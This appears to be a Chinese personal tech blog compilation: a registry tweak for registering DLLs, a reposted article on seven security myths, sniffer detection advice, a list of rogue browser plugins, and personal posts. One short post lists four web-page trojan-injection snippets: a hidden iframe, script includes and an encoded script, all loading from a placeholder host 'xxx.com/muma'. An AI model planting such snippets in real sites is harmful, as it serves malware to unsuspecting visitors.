近日,也不知怎么了,单位网络中的许多工作站IE无法打开新窗口了,表现为:在浏览网页过程中,单击超链接无任何反应。问题的原因在于IE新窗口模块被损坏所致,解决的方法早已是公开的秘密,单击“运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32  shdocvw.dll”将这两个DLL文件注册,然后重启系统,如果还不行,则可以将mshtml.dll,urlmon.dll, msjava.dll, browseui.dll, oleaut32.dll , shell32.dll 也注册一下,一般即可解决。这本没有什么好说的,但是如果一台台来注册相关的DLL控件,工作量十分大,突发奇想,能不能将注册/反注册DLL控件的命令添加右键菜单中去呢?一试竟然成功,现整理出来,与朋友共同探讨:

  第一步:打开记事本程序,录入以下内容:

  Windows Registry Editor Version 5.00  

  [HKEY_CLASSES_ROOTdllfileshell]

  [HKEY_CLASSES_ROOTdllfileshell注册]

  [HKEY_CLASSES_ROOTdllfileshell注册command]

  @="regsvr32 %1"

  [HKEY_CLASSES_ROOTdllfileshell反注册]

  "Command"="regsvr32 %1 /u"

  [HKEY_CLASSES_ROOTdllfileshell反注册command]

  @="regsvr32 %1 /u"

  录入完毕,末尾空一行以上空格,或回一下车,另存为“REGDLL.REG”,文件名任取,后缀名必须是“REG”。

  第二步:通过网上邻居将该文件共享出去,让各工作站下载该文件。

  第三步:双击“REGDLL.REG”文件,将其导入到注册表中去。

  

  好了,现在随便找一个DLL文件试试,在其上点右键,在右键菜单中就会出现“注册/反注册”的选项(如图所示)。这样,我们就可以通过选取相应的选项来注册/反注册选项的DLL文件了,十分的方便!

  许多人对于自己的数据和网络目前有一种虚假的安全感;在边界安装了防火墙、在桌面上安装了防病毒和防间谍软件工具、使用加密技术发送和保存数据;此外,微软及各大安全公司不断增强安全工具和补丁程序……似乎可以松口气了,但果真如此吗?

  以下是有关安全的七大误解,不妨看看你的数据是否有你想象中的那么安全。

  误解一:加密确保了数据得到保护

  对数据进行加密是保护数据的一个重要环节,但不是绝无差错。Jon Orbeton警告说:如今黑客采用嗅探器可是越来越完善,能够截获SSL和SSL交易信号,窃取经过加密的数据。虽然加密有助于保护遭到窃取的数据被人读取,但加密标准却存在着几个漏洞。黑客只要拥有适当工具,就能够钻这些漏洞的空子。Orbeton说:"黑客在想方设法避开安全机制。"

  误解二:防火墙会让系统固若金汤

  SteveThornburg是开发半导体联网解决方案的Mindspeed科技公司的工程师,他说:"许多人说:‘我们装有防火墙。‘但防火墙功能再好,经过它们的IP数据痕迹照样能够被读取。"黑客只要跟踪内含系统网络地址的IP痕迹,就能了解服务器及与它们相连的计算机的详细信息,然后利用这些信息钻网络漏洞的空子。

  如此看来,仅有防火墙和加密显然不够。网络管理员不仅要确保自己运行的软件版本最新、最安全,还要时时关注操作系统的漏洞报告,时时密切关注网络,寻找可疑活动的迹象。此外,他们还要对使用网络的最终用户给出明确的指导,劝他们不要安装没有经过测试的新软件,打开电子邮件的可执行附件,访问文件共享站点、运行对等软件,配置自己的远程访问程序和不安全的无线接入点,等等。

  Thornburg说,问题在于,愿意投入财力和人力来保持安全的公司寥寥无几。他说:"它们知道这么做不会受欢迎,因为这会降低工作效率。成本是主要的问题,因为这些公司都关注成本底线。"

  误解三:黑客不理睬老的软件

  一些人认为,如果运行老的系统,就不会成为黑客的攻击目标,因为黑客只盯住使用较为广泛的软件,而这些软件的版本要比我们自己正在用的来得新。

  事实并非如此,Johannes Ullrich说。他是安全分析和预警服务机构——SANS因特网风暴中心的首席技术官,这家机构负责发布有关安全漏洞和错误的警告。他提醒,对黑客来说,最近没有更新或者没有打上补丁的Web服务器是一个常见的攻击点。"许多旧版本的Apache和IIS(因特网信息服务器)会遭到缓冲器溢出攻击。"

  如果存储空间处理不了太多信息,就会出现溢出,从而会发生缓冲器溢出问题。额外信息总会溢出到某个地方,这样黑客就可以利用系统的漏洞,让额外信息进入本不该进入的地方。虽然微软和Apache.org在几年前都发布了解决缓冲器溢出问题的补丁,但还有许多旧系统没打上补丁。

  误解四:Mac机很安全

  许多人还认为,自己的Mac系统跟老系统一样,也不容易遭到黑客的攻击。但是,许多Mac机运行微软Office等Windows程序,或者与 Windows机器联网。这样一来,Mac机同样难免遇到Windows用户面临的漏洞。正如安全专家Cigital公司的CTO Gary McGraw所说:出现针对Win32和OS X的跨平台病毒"只是迟早的事"。

  Mac OS X环境也容易受到攻击,即便不是在运行Windows软件。赛门铁克公司最近发布的一份报告发现,2004年查明Mac OS X存在37种漏洞。该公司警告,这类漏洞可能会日渐成为黑客的目标,特别是因为Mac系统开始日渐流行。譬如在2004年10月,黑客编写了名为 Opener的一款脚本病毒。该脚本可以让Mac OS X防火墙失效、获取个人信息和口令、开后门以便可以远程控制Mac机,此外还可能会删除数据。

  误解五:安全工具和软件补丁让每个人更安全

  有些工具可以让黑客对微软通过其Windows update服务发布的补丁进行"逆向工程"(reverse-engineer)。通过比较补丁出现的变化,黑客就能摸清补丁是如何解决某个漏洞的,然后查明怎样利用补丁。

  Marty Lindner是卡内基梅隆大学软件工程研究所计算机紧急响应小组协调中心的事件处理小组负责人,他说:"如今开发的新工具都围绕同一个基本主题:扫描寻找漏洞。对因特网进行扫描,详细列出易受攻击的机器。所开发的工具假定每台机器都容易遭到某个漏洞的攻击,然后只需运行工具就是了。每个系统都有漏洞;没有什么是百分之百安全的。"

  黑客普遍使用的工具当中就有Google,它能够搜索并找到诸多网站的漏洞,譬如默认状态下的服务器登录页面。有人利用Google寻找不安全的网络摄像头、网络漏洞评估报告、口令、信用卡账户及其他敏感信息。Santy蠕虫和MyDoom的新变种最近就利用了Google的黑客功能(Google hacking)。甚至已经开始涌现出了Johnny.IHackStuff.com这样的网站,它们提供链接到介绍越来越多的Google黑客手法的地方。

  今年早些时候,McAfee公司发布了SiteDigger 2.0工具的更新版,它有一些新特性,譬如可以查明某个站点是不是容易受到Google黑客攻击。虽然这款工具的目的是供管理员测试各自的网络,但黑客也有可能利用该软件寻找任何站点存在的漏洞。

  误解六:只要企业网络的安全没有被突破,黑客就奈何不了你

  有些IT部门拼命防护企业网络,却不料因为用户把公司的便携式电脑接到家里或者Wi-Fi热点地区等未受保护的网络连接,结果企业网安全遭到危及。黑客甚至可以在热点地区附近未授权的Wi-Fi接入点,诱骗用户登录到网络。一旦恶意用户控制了某台计算机,就可以植入击键记录程序,窃取企业VPN软件的口令,然后利用窃取的口令随意访问网络。

  有时候,单单恐吓要搞破坏也会迫使公司就范,黑客甚至扬言要破坏网站、删除重要文件,或者把幼儿色情图片放到公司计算机上,从而对受害者进行敲诈。这已有过先例,据说,因黑客扬言要发动拒绝服务攻击敲诈钱财,英国有许多网上赌博站点一直在出钱消灾。

  误解七:如果你为安全公司工作,数据就安然无恙

  连据认为最安全的组织也有可能发现自己容易受到黑客的攻击。位于弗吉尼亚州费尔法克斯的乔治梅森大学是安全信息系统中心的所在地,向来不乏安全专家。但这个工作场所最近发现,黑客攻击了这所大学的主ID服务器、往服务器中安装了搜寻其他大学的系统的工具后,32000多名学生和教职员工的姓名、社会保障号码以及照片在黑客面前暴露无遗。黑客可能通过没有防火墙保护的计算机潜入进来,然后植入了扫描工具,寻找闯入其他系统的口令。

  这家大学立即采取了对策,关闭了服务器中的部分系统,用不同的ID号取代了学生们的社会保障号码,防范身份失窃。校方还在允许计算机连接到其网络之前,先使用软件进行扫描;建立较小的子网,隔离存放有敏感数据的计算机;更加密切地监控整个网络的活动。

  连一些国家的国防部门也不能幸免。它们只好不断部署新软件以防范新出现的漏洞,并且坚持采用经过实践证明可靠的安全方法。譬如说,加拿大国防部就使用 Vanguard Integrity Professionals公司的Vanguard Security Solutions 5.3,保护所用的IBM eServer zSeries大型机。这款软件包括采用双令牌的用户验证机制,可以同IBM用于z/OS的资源访问控制工具(RACF)配合使用。

  加拿大国防部的RACF中心管理员George Mitchell说,他总是保持高度警惕,以防未授权用户获得访问系统的机会。除了使用监控工具外,他还要运用常识。"我会让某人打电话告诉大致情况。如果某人想更改口令,我会问几个问题,通过加密的电子邮件对该人进行答复。"

  归根结蒂是需要始终保持谨慎。前不久,社会名流帕丽斯希尔顿(Paris Hilton)储存在T-Mobile Sidekick手机的资料被黑客公布到网上;ChoicePoint和LexisNexis两家公司为顾客保存的机密的信用信号被人窃取,这些事件表明,黑客采用的伎俩越来越五花八门。黑客在利用不断增多的漏洞时,手法越来越新奇,所以我们的任务就是随时关注最新工具和技巧,采取相应的措施自我保护。

  原文地址:http://hacker57.it.com.cn/articles/107791.htm

1、怎样发现 Sniffer

  Sniffer最大的危险性就是它很难被发现,在单机情况下发现一个Sniffer还是比较容易的,可以通过查看计算机上当前正在运行的所有程序来实现,当然这不一定可靠。

  在UNIX系统下可以使用下面的命令:ps-aux。这个命令列出当前的所有进程、启动这些进程的用户、它们占用CPU的时间以及占用多少内存等等。在Windoos系统下,可以按下Ctrl+Alt+Del键,查看任务列表。不过,编程技巧高的Sniffer即使正在运行,也不会出现在这里。

  另一个方法就是在系统中搜索,查找可怀疑的文件。但人侵者用的可能是他们自己写的程序,所以这给发现Sniffer造成相当大的困难。还有许多工具能用来查看你的系统会不会处于混杂模式,从而发现是否有一个Sniffer正在运行。但在网络情况下要检测出哪一台主机正在运行Sniffer是非常困难的,因为Sniffer是一种被动攻击软件,它并不对任何主机发出数据包,而只是静静地运行着,等待着要捕获的数据包经过。

  2、抵御 Sniffer

  虽然发现一个Sniffer是非常困难的,但是我们仍然有办法抵御Sniffer的嗅探攻击。既然Sniffer要捕获我们的机密信息,那我们干脆就让它捕获,但事先要对这些信息进行加密,黑客即使捕捉到了我们的机密信息,也无法解密,这样,Sniffer就失去了作用。

  黑客主要用Sniffer来捕获Telnet、FTP、POP3等数据包,因为这些协议以明文在网上传输,我们可以使用一种叫做SSH的安全协议来替代Telnet等容易被Sniffer攻击的协议。

  SSH又叫Secure Shell,它是一个在应用程序中提供安全通信的协议,建立在客户/服务器模型上。SSH服务器分配的端口是22,连接是通过使用一种来自RSA的算法建立的。在授权完成后,接下来的通信数据用IDEA技术来加密。这种加密方法通常是比较强的,适合于任何非秘密和非经典的通信。

  SSH后来发展成为F-SSH,提供了高层次的、军方级别的对通信过程的加密。它为通过TCP/IP的网络通信提供了通用的最强的加密。如果某个站点使用F—SSH,用户名和口令就不再重要了。目前,还没有人突破过这种加密方法。即使是Sniffer,收集到的信息将不再有价值。有兴趣的读者可以参看与SSH相关的书籍。

  另一种抵御Sniffer攻击的方法是使用安全的拓扑结构。因为Sniffer只对以太网、令牌环网等网络起作用,所以尽量使用交换设备的网络可以从最大程度上防止被Sniffer窃听到不属于自己的数据包。还有一个原则用于防止Snther的被动攻击一个网络段必须有足够的理由才能信任另一网络段。网络段应该从考虑具体的数据之间的信任关系上来设计,而不是从硬件需要上设计。一个网络段仅由能互相信任的计算机组成。通常它们在同一个房间里,或在同一个办公室里,应该固定在建筑的某一部分。注意每台机器是通过硬连接线接到集线器(Hub)的,集线器再接到交换机上。由于网络分段了,数据包只能在这个网段上被捕获,其余的网段将不可能被监听。

  所有的问题都归结到信任上面。计算机为了和其他计算机进行通信,它就必须信任那台计算机。系统管理员的工作就是决定一个方法,使得计算机之间的信任关系很小。这样,就建立了一种框架,告诉你什么时候放置了一个Sniffer,它放在哪里,是谁放的等等。

  如果局域网要和Internet相连,仅仅使用防火墙是不够的。人侵者已经能从一个防火墙后面扫描,并探测正在运行的服务。应该关心的是一旦人侵者进人系统,他能得到些什么。你必须考虑一条这样的路径,即信任关系有多长。举个例子,假设你的Web服务器对计算机A是信任的,那么有多少计算机是A 信任的呢?又有多少计算机是受这些计算机信任的呢?一句话,就是确定最小信任关系的那台计算机。在信任关系中,这台计算机之前的任何一台计算机都可能对你的计算机进行攻击并成功。你的任务就是保证一旦出现Sniffer,它只对最小范围有效。

  Sniffr往往是在攻击者侵人系统后使用的,用来收集有用的信息。因此,防止系统被突破很关键。系统安全管理员要定期的对所管理的网络进行安全测试,防止安全隐患。同时要控制拥有相当权限的用户的数量,因为许多攻击往往来自网络内部。

  3、防止 Sniffer的工具 Antisnff

  Antisniff是由著名黑客组织(现在是安全公司了)L0pht开发的工具,用于检测本地网络是否有机器处于混杂模式(即监听模式)。

  一台处于混杂模式的机器意味着它很可能已被入侵并被安装了Sniffer。对于网络管理员来说,了解哪台机器正处于混杂模式以作进一步的调查研究是非常重要的。

  Antisniff 1.X版运行在以太网的WindOWS NT系统中,并提供了简单易用的用户图形界面。该工具以多种方式测试远程系统是否正在捕捉和分析那些并不是发送给它的数据包。这些测试方法与其操作系统本身无关。

  Antisniff运行在本地以太网的一个网段上。如果在非交换式的C类网络中运行,Antisniff能监听整个网络;如果网络交换机按照工作组来隔离,则每个工作组中都需要运行一个Antisniff。原因是某些特殊的测试使用了无效的以太网地址,另外某些测试需要进行混杂模式下的统计(如响应时间、包丢失率等)。

  Antisniff的用法非常简便,在工具的图形界面中选择需要进行检查的机器,并且指定检查频率。对于除网络响应时间检查外的测试,每一台机器会返回一个确定的正值或负值。返回的正值表示该机器正处于混杂模式,这就有可能已经被安装了Sniffer。

  对于网络响应时间测试的返回值,建议根据第一次返回的数值计算标准值,然后再对在flood和非flood两次测试时返回的结果有较大变化的机器进行检查。一旦这些机器退出混杂模式返回到正常操作模式下,Antisniff的下一次测试将会记录到混杂模式和非混杂模式的差值(正值)。

  应该周期性地运行Antisniff,具体周期值根据不同的站点、不同的网络负荷、测试的机器数量和网站策略等而有所不同。

最近,ChinaBytes列出了一个中国流氓插件排行榜,包含了130个不完全名单。大家看看,如果电脑里面有下列软件的话,最好卸载掉吧。

1. 网络猪
2. 完美网译通
3. CNNIC中文上网
4. 博采网摘
5. 百度搜霸
6. 3721上网助手
7. Dudu下载加速器
8. 很棒小秘书
9. 一搜工具条
10. 划词搜索
11. eBay工具条
12. 娱乐心空
13. Yahoo助手(原3721)
14. 搜狗
15. 彩信通
16.360搜
17.多多QQ表情
18.易趣工具栏
19.很棒通行证
20.搜易网弹出广告
21.天下搜
22.U88财富快车工具条
23.唯刊
24.完美网译通
25.协和医院弹出广告
26.YOK工具条
27.桌面传媒(Desktop media)
28.酷站导航
29.中网媒体速递
30.DIY彩秀
31.电鹰搜索
32.SearchNet(中搜地址栏搜索)
33.New.net
34.Xbar 图铃随e下
35.win survey (MSIBM)
36.ZCOM
37.搜搜工具条(SOSO)
38.ShareHelper
39.播霸猫眼网络电视迷你版
40.天天搜索
41.SeAD/DmAD
42.酷客娱乐平台
43.Bysoo百搜工具栏
44.Infofo工具栏
45.ishare
46.酷猴
47.MSser
48.ZDA WebMisc天网广告软件
49.Win stdup
50.网址极限
51.Copyso 拷贝搜
52.搜狗直通车
53.8848购物搜索
54.IE伴郎
55.51888彩信助手
56.青娱乐
57.虎翼DIY吧
58.迷你PP
59.迷你迅雷
60.Alibaba商机直通车
61.网易搜霸
62.搜一搜
63.17lele网游
64.新浪iGAME游戏总动园
65.新浪点点通
66.miphone小蜜蜂
67.金山产品下载器
68.Ibar
69.DMCast桌面传媒
70.私人磁盘
71.极品数字网络电视
72.NetFish网络钓鱼克星
73.T2BHO
74.开心运程速递插件
75.Xplus
76.ADDeliverer
77.TargetAD
78.DTservice
79.EliteBar
80.ADO
81.EyeOnIE class
82.Router layer
83.InsII
84.Hotbar
85.Netbus Toolbar
86.31G上网直通车
87.139LOVE
88.Urlcom
89.Sol099
90.wz101
91.ADNavihepler(女生宿舍)
92.自由行中文域名
93.赢政天下网摘
94.易搜搜索引擎
95.迅彩图铃通
96.新浪VIVI收藏夹
97.新华快信
98.网游天使自助远程挂机平台
99.网易SMS Ppinstall Control
100.网眼天下WebEye
101.同花顺工具条
102.天天在线.黑龙江PortalCom Control2.0
103.腾讯极速下载控件
104.闪电搜霸Flashbar
105.塞我网CyworldChina
106.亲亲娱乐伴侣
107.每步直达网址
108.空中网彩信通
109.九寻音乐 音乐搜索伴侣软件1.0.0.3
110.金山安全助手
111.金盒子MultiUpload
112.广东互联星空CertInstall Control
113.恶意网站克星 木马间谍克星
114.初收获工具条
115.藏鲸阁
116.百易汉字域名
117.百度搜索伴侣
118.百度超级搜霸
119.爱美思中文邮址
120.阿里巴巴智能搜索
121.Yoday
122.xintv.com Timer Object
123.Kincent Q.Audio Control Class
124.K65.net组件
127.HarrySou ToolBar
128.EPSON Web Printer-SelfTest Control Class
129.ClockSync
130.668企业通道工具栏

来源:ChinaByte

19日帮忙去婚礼照相,帮GF在加长凯第拉克里面照了一张很Cool的照片,贴上来共享下,呵呵。
很有意向更换相机,所以研究了一下DSLR的相机,发现价格都太挺了,比较了一下,感觉Canon EOS350D的性价比比较高,但是套机的价格还是在¥6000.00左右。贵啊!等再Research下看看,有没有必要购买DSLR的相机,还是性能好点的相机就行了……图片附件:
dsc00011_resize.jpg

今天上网查招行信用卡的申请情况,发现申请失败了,郁闷!
“因为综合评分不足,您的申请未能通过。如有疑问,请致电24小时客户电话800-820-5555,我们将竭诚为您服务!”
不过我决定再找一些财力证明,重新申请一份!

介绍两个比较好的旅游网站给大家,可以在上面定打折机票的!
1. 携程网 http://www.ctrip.com
2. 芒果网 http://www.mangocity.com

另外关于YNGPS的,我已经拿到了中国电子地图的2006版,不过我还没试,等我试了成功以后,我再把它放到YNGPS的网站上。不过YNGPS的网站估计要换服务器了,打算把YNGPS弄成Blog+Forum的形式。这个网站在我开通一年以后,终于又了起色了,呵呵!

下面是中国电子地图2006版的eMule的下载Link:
ed2k://|file|%E4%B8%AD%E5%9B%BD%E7%94%B5%E5%AD%90%E5%9C%B0%E5%9B%BE2006.zip|426131975|5FB9B5083FE69800F42CEF634FA96A63|h=3EB5YO2E5VNODBGWLRIEGYLPTCYK4V7Y|/

现在终于换成SaBlog的系统了,但是我发现几个比较关键的问题…

1. SaBlog里面的图片只能做为附件来上传,不能象C-Blog一样可以在文本中添加图片。
2. SaBlog不带留言簿、不带评论回复功能。
3. SaBlog不能记录访客的信息,如IP、所使用的浏览器等。

如果SaBlog可以解决如上的三个问题的话,就Perfect了。

另外我发现,SaBlog在用手机访问时是不显示图片的。希望SaBlog能在下个版本中完善这个功能。:)

今天遇到一台机器,什么都好。但就是不能运行3D的程序,如3DMarks、WOW等等。只要一运行就死机。我检测了系统等等都没问题,最后拆卡机器时发现:显卡的风扇都飞出来了!然而,这台机器还是SLI的系统,居然两块显卡都发生同模同样的问题!这就不得不怀疑一下显卡的质量了。这两块显卡的型号是UNIKA 6618GT。应该还是不错的了,但是居然还发生了这样的问题。最后在更换了两块显卡的风扇+散热片以后解决了问题。

UNIKA还是品质很不错的牌子了,居然遇上这种问题。估计是散热片温度太高,把风扇的底座烧化了,然后风扇就整个的掉了出来。见图

图片附件:
image_231.jpg
图片附件:
image_232.jpg

  一、最简单的也是最有效的 

  <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

  二、js挂马

  <script src=http://www.xxx.com/muma.js></script>

  三、js变形加密

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

  muma.txt可改成任意后缀的。

  四、不是嵌入了与iframe不同

  top.document.body.innerHTML = top.document.body.innerHTML + ‘<iframe src="木马地址"></iframe>‘

今天终于把Blog换到SaBlog上了,好多Blog内容啊。不过最气愤的就是C-Blog自作主张的在我的Blog文件中的双引号和反斜杠前面都加了反斜杠。弄得程序代码乱成一片。郁闷啊,单凭这一点我就要把C-Blog换掉。损坏的代码我只有尽量恢复了。到今天为止还没有搬完,找时间接着接着搬~

已经把Sa-Blog的模板修改了,改成适合1024×768全屏的,更改了Logo。